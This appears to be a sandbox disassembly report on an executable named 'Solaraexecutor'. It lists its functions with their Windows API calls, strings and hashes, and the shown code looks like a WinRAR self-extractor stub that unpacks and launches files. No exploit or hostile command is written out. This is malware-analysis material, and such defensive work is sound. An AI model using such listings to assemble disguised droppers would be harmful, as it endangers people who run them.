Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 4d9428a8e80cfc5fd3b960b4b2dc4ff0214ea23c7511cffc4374409afa20ac1f
Instruction ID: 94b4f9b33a15e8731db59f58c7549bcaa0026d2566496df3324a8096ea2c561c
Opcode Fuzzy Hash: 4d9428a8e80cfc5fd3b960b4b2dc4ff0214ea23c7511cffc4374409afa20ac1f
Instruction Fuzzy Hash: 08824D70905265AEDF15CF64D891BFAB7B9FF25308F0C41B9E8499B142CB315A88DB70

Function 00D3B7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D3B7E5

Part of subcall function 00D21316: GetDlgItem.USER32(00000000,00003021), ref: 00D2135A
Part of subcall function 00D21316: SetWindowTextW.USER32(00000000,00D535F4), ref: 00D21370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D3B8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D3B8EF
IsDialogMessageW.USER32(?,?), ref: 00D3B902
TranslateMessage.USER32(?), ref: 00D3B910
DispatchMessageW.USER32(?), ref: 00D3B91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00D3B93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00D3B960
GetDlgItem.USER32(?,00000068), ref: 00D3B983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D3B99E
SendMessageW.USER32(00000000,000000C2,00000000,00D535F4), ref: 00D3B9B1

Part of subcall function 00D3D453: _wcslen.LIBCMT ref: 00D3D47D

SetFocus.USER32(00000000), ref: 00D3B9B8
_swprintf.LIBCMT ref: 00D3BA24

Part of subcall function 00D24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D240A5

Part of subcall function 00D3D4D4: GetDlgItem.USER32(00000068,00D7FCB8), ref: 00D3D4E8
Part of subcall function 00D3D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00D3AF07,00000001,?,?,00D3B7B9,00D5506C,00D7FCB8,00D7FCB8,00001000,00000000,00000000), ref: 00D3D510
Part of subcall function 00D3D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D3D51B
Part of subcall function 00D3D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00D535F4), ref: 00D3D529
Part of subcall function 00D3D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D3D53F
Part of subcall function 00D3D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00D3D559
Part of subcall function 00D3D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D3D59D
Part of subcall function 00D3D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00D3D5AB
Part of subcall function 00D3D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D3D5BA
Part of subcall function 00D3D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D3D5E1
Part of subcall function 00D3D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00D543F4), ref: 00D3D5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00D3BA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00D3BA90
GetTickCount.KERNEL32 ref: 00D3BAAE
_swprintf.LIBCMT ref: 00D3BAC2
GetLastError.KERNEL32(?,00000011), ref: 00D3BAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00D3BB43
_swprintf.LIBCMT ref: 00D3BB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00D3BBD0
GetCommandLineW.KERNEL32 ref: 00D3BBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00D3BC47
ShellExecuteExW.SHELL32(0000003C), ref: 00D3BC6F
Sleep.KERNEL32(00000064), ref: 00D3BCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00D3BCE2
CloseHandle.KERNEL32(00000000), ref: 00D3BCEB
_swprintf.LIBCMT ref: 00D3BD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D3BD7D
SetDlgItemTextW.USER32(?,00000065,00D535F4), ref: 00D3BD94
GetDlgItem.USER32(?,00000065), ref: 00D3BD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 00D3BDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00D3BDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D3BE68
_wcslen.LIBCMT ref: 00D3BEBE
_swprintf.LIBCMT ref: 00D3BEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 00D3BF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00D3BF4C
GetDlgItem.USER32(?,00000068), ref: 00D3BF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00D3BF6B
GetDlgItem.USER32(?,00000066), ref: 00D3BF85
SetWindowTextW.USER32(00000000,00D6A472), ref: 00D3BFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00D3C007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D3C01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00D3C0BD
EnableWindow.USER32(00000000,00000000), ref: 00D3C197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00D3C1D9

Part of subcall function 00D3C73F: __EH_prolog.LIBCMT ref: 00D3C744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D3C1FD

Strings

%s, xrefs: 00D3BED8
C:\Users\user\Desktop, xrefs: 00D3BBC9
<, xrefs: 00D3BB84
"%s"%s, xrefs: 00D3BD0D
STARTDLG, xrefs: 00D3B801
winrarsfxmappingfile.tmp, xrefs: 00D3BBA6
-el -s2 "-d%s" "-sp%s", xrefs: 00D3BB6B
__tmp_rar_sfx_access_check_%u, xrefs: 00D3BAB5
@, xrefs: 00D3BB91
LICENSEDLG, xrefs: 00D3C0B2

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3445078344-2238251102
Opcode ID: 728e20b8af470e2dce3c6ea7dcb0cb99f4f1ae6593b3612cdc9106668895923d
Instruction ID: ff4f1110f4f1dd1dc1148f763f435d9cb72a084d1e0d826ebd15918eebefcc7e
Opcode Fuzzy Hash: 728e20b8af470e2dce3c6ea7dcb0cb99f4f1ae6593b3612cdc9106668895923d
Instruction Fuzzy Hash: 42421471944358BEEB219B749C4AFBE7B6CEB11B10F040155F648F62D2DBB4AA48CB31

Function 00D30863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 00D3087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D3088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D308BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D30B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D30B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D30B93
ReadFile.KERNEL32(00000000,?,00007FFE,00D53C7C,00000000), ref: 00D30BB1
CloseHandle.KERNEL32(00000000), ref: 00D30C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D30C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00D53C7C,?,00000000,?,00000800), ref: 00D30C72
GetFileAttributesW.KERNELBASE(?,?,00D53C7C,00000800,?,00000000,?,00000800), ref: 00D30C9C
GetFileAttributesW.KERNEL32(?,?,00D53D44,00000800), ref: 00D30CD8

Part of subcall function 00D3081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D30836
Part of subcall function 00D3081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D2F2D8,Crypt32.dll,00000000,00D2F35C,?,?,00D2F33E,?,?,?), ref: 00D30858

_swprintf.LIBCMT ref: 00D30D4A
_swprintf.LIBCMT ref: 00D30D96

Part of subcall function 00D24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D240A5

AllocConsole.KERNEL32 ref: 00D30D9E
GetCurrentProcessId.KERNEL32 ref: 00D30DA8
AttachConsole.KERNEL32(00000000), ref: 00D30DAF
_wcslen.LIBCMT ref: 00D30DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00D30DD5
WriteConsoleW.KERNEL32(00000000), ref: 00D30DDC
Sleep.KERNEL32(00002710), ref: 00D30DE7
FreeConsole.KERNEL32 ref: 00D30DED
ExitProcess.KERNEL32 ref: 00D30DF5

Strings

SetDefaultDllDirectories, xrefs: 00D308B9
DXGIDebug.dll, xrefs: 00D308FC, 00D30C5E
kernel32, xrefs: 00D30873
uxtheme.dll, xrefs: 00D30D17
dwmapi.dll, xrefs: 00D30927, 00D30D0D
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00D30D84
SetDllDirectoryW, xrefs: 00D30888

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: 288fe95475a6081534db73cfd24ad28f09e37472cb1b36026b278852b468f6e6
Instruction ID: 73b1418ff653412bcdb8af9ab96b752983c7a70f55b42bd00cdd49478b0caf4f
Opcode Fuzzy Hash: 288fe95475a6081534db73cfd24ad28f09e37472cb1b36026b278852b468f6e6
Instruction Fuzzy Hash: 61D162B1008344ABDB219F54D859A9FBBF8EF8578AF50491DFD8596380DBB0864CCB72

Function 00D3C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00D3C744

Part of subcall function 00D3B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00D3B3FB

_wcslen.LIBCMT ref: 00D3CA0A
_wcslen.LIBCMT ref: 00D3CA13
SetWindowTextW.USER32(?,?), ref: 00D3CA71
_wcslen.LIBCMT ref: 00D3CAB3
_wcsrchr.LIBVCRUNTIME ref: 00D3CBFB
GetDlgItem.USER32(?,00000066), ref: 00D3CC36
SetWindowTextW.USER32(00000000,?), ref: 00D3CC46
SendMessageW.USER32(00000000,00000143,00000000,00D6A472), ref: 00D3CC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D3CC7F

Strings

<br>, xrefs: 00D3C9D4
Software\Microsoft\Windows\CurrentVersion, xrefs: 00D3CB1A
%s.%d.tmp, xrefs: 00D3C940
ProgramFilesDir, xrefs: 00D3CB45

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2804936435-312220925
Opcode ID: 83ec09a2a3152ff6f3a769bca516af6e05b2369bc2bfe9ea4fd1a9d3cb766dca
Instruction ID: 029510e107a585f9866bedddd7934b9a875a9eef284cedb43a1ecf7fa3493211
Opcode Fuzzy Hash: 83ec09a2a3152ff6f3a769bca516af6e05b2369bc2bfe9ea4fd1a9d3cb766dca
Instruction Fuzzy Hash: 98E132B2900219AADF25DBA4DC85EEE73BCEB04350F4441A6FA49E7150EB749F848F71

Function 00D2DA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D2DA70
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D2DAAC

Part of subcall function 00D2C29A: _wcslen.LIBCMT ref: 00D2C2A2

Part of subcall function 00D305DA: _wcslen.LIBCMT ref: 00D305E0

Part of subcall function 00D31B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00D2BAE9,00000000,?,?,?,00010424), ref: 00D31BA0

_wcslen.LIBCMT ref: 00D2DDE9
__fprintf_l.LIBCMT ref: 00D2DF1C

Strings

@%s:, xrefs: 00D2DF06, 00D2DF12
$%s:, xrefs: 00D2DEFF
,, xrefs: 00D2DF57
*messages***, xrefs: 00D2DBFA
, xrefs: 00D2DD6C
R, xrefs: 00D2DC0C
*messages***, xrefs: 00D2DBC1
a, xrefs: 00D2DC16
RTL, xrefs: 00D2DEDE

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 566448164-801612888
Opcode ID: 6be21bd273dbf8aba5e08e8e0410d4ddca2b0a157fd557ef2e125acfb50e004a
Instruction ID: efa98634795b0225cd2fbf4689c35e77900ba31f29281a28c50c64e02d4c237e
Opcode Fuzzy Hash: 6be21bd273dbf8aba5e08e8e0410d4ddca2b0a157fd557ef2e125acfb50e004a
Instruction Fuzzy Hash: 8132D171900228DBDF25EF68E841AEE77A5FF29308F44016AF94697281E7B1DD85CB70

Function 00D3D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D3B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D3B579
Part of subcall function 00D3B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D3B58A
Part of subcall function 00D3B568: IsDialogMessageW.USER32(00010424,?), ref: 00D3B59E
Part of subcall function 00D3B568: TranslateMessage.USER32(?), ref: 00D3B5AC
Part of subcall function 00D3B568: DispatchMessageW.USER32(?), ref: 00D3B5B6

GetDlgItem.USER32(00000068,00D7FCB8), ref: 00D3D4E8
ShowWindow.USER32(00000000,00000005,?,?,?,00D3AF07,00000001,?,?,00D3B7B9,00D5506C,00D7FCB8,00D7FCB8,00001000,00000000,00000000), ref: 00D3D510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D3D51B
SendMessageW.USER32(00000000,000000C2,00000000,00D535F4), ref: 00D3D529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D3D53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00D3D559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D3D59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00D3D5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D3D5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D3D5E1
SendMessageW.USER32(00000000,000000C2,00000000,00D543F4), ref: 00D3D5F0

Strings

\, xrefs: 00D3D549

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: cd876f6e64b77417add20e1134da5f66bb53126704e2edfd526a4e4888b4a2ed
Instruction ID: 22da2ad01e64e27a55e18ffaa8a3c5ba2ed687e0482a228abe51d6f979271ba1
Opcode Fuzzy Hash: cd876f6e64b77417add20e1134da5f66bb53126704e2edfd526a4e4888b4a2ed
Instruction Fuzzy Hash: AD31A171145742AFE301DF20AC4AFAB7FACEB86B15F000508F555D62D0EB659A088B77

Function 00D3D78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 00D3D7AE
ShellExecuteExW.SHELL32(?), ref: 00D3D8DE
ShowWindow.USER32(?,00000000), ref: 00D3D91D
GetExitCodeProcess.KERNEL32(?,?), ref: 00D3D959
CloseHandle.KERNEL32(?), ref: 00D3D97F
ShowWindow.USER32(?,00000001), ref: 00D3D9E1

Strings

.exe, xrefs: 00D3D989
.inf, xrefs: 00D3D89A

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: 7f1875a33b3f01f5e2f6563e5f6f7e9b220c6218a6f1c3198aacc2193ba831db
Instruction ID: 976e260b4005d20bc82939d1b284bd4113f01a357b7f67e1f566fa6ee621b160
Opcode Fuzzy Hash: 7f1875a33b3f01f5e2f6563e5f6f7e9b220c6218a6f1c3198aacc2193ba831db
Instruction Fuzzy Hash: 8051B2754043809ADB319F24B844BABBBE6AF41744F0C081EF9C5D7291E7B19A88CF72

Function 00D4A95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D45695,00D45695,?,?,?,00D4ABAC,00000001,00000001,2DE85006), ref: 00D4A9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D4ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00D4AA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D4AB35
__freea.LIBCMT ref: 00D4AB42

Part of subcall function 00D48E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D4CA2C,00000000,?,00D46CBE,?,00000008,?,00D491E0,?,?,?), ref: 00D48E38

__freea.LIBCMT ref: 00D4AB4B
__freea.LIBCMT ref: 00D4AB70

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 2e0841239e4e5e2a3fc0aaf5f88d4d802d8fc1f696aaefa8030a6ef792cb80ce
Instruction ID: 96430d06d43b7133f77cda31f5fcc004b4233188dbf25b377d7ddd893cd69001
Opcode Fuzzy Hash: 2e0841239e4e5e2a3fc0aaf5f88d4d802d8fc1f696aaefa8030a6ef792cb80ce
Instruction Fuzzy Hash: 0751C572650216AFDB258F68CC42EBFB7AAEF44750F194629FC04E6140EB34DC54D6B2

Function 00D43B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00D43C35,?,?,00D82088,00000000,?,00D43D60,00000004,InitializeCriticalSectionEx,00D56394,InitializeCriticalSectionEx,00000000), ref: 00D43C03

Strings

api-ms-, xrefs: 00D43BC3

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 3312a45fee138475dcc7279b51f46b6c26b9825ec73dc84f7cf3901a9bd25ff9
Instruction ID: 26c325ba5750d336b177dcb675989e5d49557d82e2b62db88725bbf28a8cc30e
Opcode Fuzzy Hash: 3312a45fee138475dcc7279b51f46b6c26b9825ec73dc84f7cf3901a9bd25ff9
Instruction Fuzzy Hash: 6611A032A45721ABDB228B6CDC41B5A77A4DF017B1F290220ED55EB290E770EF008AF5

Function 00D3AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D3081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D30836
Part of subcall function 00D3081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D2F2D8,Crypt32.dll,00000000,00D2F35C,?,?,00D2F33E,?,?,?), ref: 00D30858

OleInitialize.OLE32(00000000), ref: 00D3AC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D3AC66
SHGetMalloc.SHELL32(00D68438), ref: 00D3AC70

Strings

3Uo, xrefs: 00D3AC47
riched20.dll, xrefs: 00D3AC1E

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3Uo
API String ID: 3498096277-2552611257
Opcode ID: 725311273897e95c38085b50221cab4ffa5d1590dc425a529aaa3c984f8b84fb
Instruction ID: eccef94d39e77d748b5d6a133adc61b45e0461501ea016353cc9ee9153e8627f
Opcode Fuzzy Hash: 725311273897e95c38085b50221cab4ffa5d1590dc425a529aaa3c984f8b84fb
Instruction Fuzzy Hash: 5BF0F9B1900209ABCB10AFA9D8499AFFFFCEF94B04F00415AA815E2241DBB456458BB1

Function 00D298E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00D27760,?,00000005,?,00000011), ref: 00D2995F
